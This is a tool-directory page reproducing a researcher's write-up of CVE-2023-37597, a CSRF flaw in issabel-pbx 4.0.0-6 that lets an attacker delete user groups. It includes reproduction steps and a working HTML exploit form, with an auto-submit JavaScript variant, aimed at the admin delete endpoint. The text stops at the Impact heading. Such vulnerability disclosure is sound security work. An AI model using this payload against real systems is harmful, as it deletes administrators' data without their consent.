Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 contains a Cross-Site Request Forgery (CSRF) vulnerability in its user group management functionality. | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37597
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 contains a Cross-Site Request Forgery (CSRF) vulnerability in its user group management functionality.

View Repository
1147 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-37597 — issabel-pbx 4.0.0-6: Cross-Site Request Forgery (CSRF) — Delete User Group

Disclaimer: This repository is intended for educational and authorized security research purposes only. Do not use this exploit against any system you do not own or have explicit written permission to test.


Table of Contents

  • Overview
  • Vulnerability Details
  • Affected Product
  • Technical Analysis
  • Attack Scenario
  • Proof of Concept (PoC)
    • Steps to Reproduce
    • PoC Exploit Code
  • Impact
  • Mitigation & Remediation
  • Disclosure Timeline
  • References
  • Author

Overview

issabel-pbx is a widely used open-source Unified Communications platform (PBX) that provides VoIP services, telephony management, and web-based administration. Version 4.0.0-6 of issabel-pbx contains a Cross-Site Request Forgery (CSRF) vulnerability in its user group management functionality.

An unauthenticated remote attacker can craft a malicious HTML page that, when visited by an authenticated administrator, silently issues a forged HTTP POST request to delete any user group. Because the application does not validate the origin of state-changing requests with CSRF tokens or SameSite cookie policies, the browser automatically includes the administrator's session cookie, causing the deletion to succeed without the victim's knowledge or consent.


Vulnerability Details

FieldValue
CVE IDCVE-2023-37597
VulnerabilityCross-Site Request Forgery (CSRF)
CWECWE-352 — Cross-Site Request Forgery (CSRF)
SeverityMedium
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Affected Versionissabel-pbx 4.0.0-6
Disclosed10 July 2023
ResearcherSahil Ojha

Affected Product

FieldValue
Product Nameissabel-pbx
Version4.0.0-6
VendorIssabel Foundation
Vendor Homepagehttps://www.issabel.org/
Source Codehttps://github.com/IssabelFoundation/issabelPBX
Tested OnWindows (Burp Suite Community Edition)

Technical Analysis

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that tricks a victim's browser into sending an authenticated request to a target application on behalf of the attacker. The attack succeeds when:

  1. The victim has an active authenticated session with the target application.
  2. The application relies solely on session cookies to authenticate requests (i.e., no CSRF token, no Origin/Referer validation, no SameSite=Strict or SameSite=Lax cookie attribute).
  3. The attacker can predict the structure of the state-changing request.

Root Cause

The User Group delete endpoint (/index.php?menu=grouplist) in issabel-pbx 4.0.0-6 processes HTTP POST requests that contain only the delete action and an id_user parameter. The application does not:

  • Generate or validate a synchronizer (anti-CSRF) token.
  • Check the Origin or Referer HTTP headers.
  • Set the SameSite attribute on session cookies.

As a result, any web page loaded in the victim's browser can silently submit the deletion form using the victim's existing session, as the browser will automatically attach the session cookie.

Vulnerable Endpoint

POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

Attack Scenario

  1. Attacker crafts a malicious HTML page containing a hidden form that POSTs the deletion request to the Issabel admin panel.
  2. Attacker delivers the page to an authenticated Issabel administrator — via phishing email, a link in a chat message, or an embedded `` on a compromised page.
  3. Victim's browser loads the page. JavaScript automatically submits the form, or the victim is socially-engineered into clicking a fake "Submit" button.
  4. Issabel server receives a valid POST request with the administrator's session cookie and deletes the targeted user group without any additional confirmation or token validation.
  5. The user group is permanently removed, potentially disrupting call routing, access controls, and all users who depended on that group — effectively causing a denial of service at the application level.

Proof of Concept (PoC)

Warning: The following PoC is provided strictly for educational purposes. Use it only in lab environments or systems for which you have explicit authorization.

Steps to Reproduce

Step 1 — Log in to the Issabel admin panel

Navigate to the User Group list page and log in with administrator credentials.

https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

Admin panel — User Group List


Step 2 — Capture the delete request

Attempt to delete a user group while proxying traffic through Burp Suite. Right-click the captured POST request and select Engagement Tools → Generate CSRF PoC to produce the exploit HTML skeleton.

Burp Suite — Captured DELETE request


Step 3 — Host the CSRF exploit page

Save the generated HTML as a file (see PoC Exploit Code below). Host it on an attacker-controlled server, or send it directly to the victim.


Step 4 — Victim opens the exploit page

When the authenticated administrator opens or is redirected to the exploit URL, the hidden form is auto-submitted (or the victim clicks the decoy button). The targeted user group is deleted from the admin panel.

Exploit submitted — group deleted (before)

Exploit submitted — group deleted (after)


PoC Exploit Code

The following HTML file (also available as CSRF exploit.html) demonstrates the attack. Replace {Issabel IP} with the target host and adjust id_user to match the group ID you want to delete.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Auto-submit variant: To remove the need for the victim to click anything, add the following inside the <body> tag so the form submits automatically on page load:

<script>document.forms[0].submit();</script>

Impact

Download Tool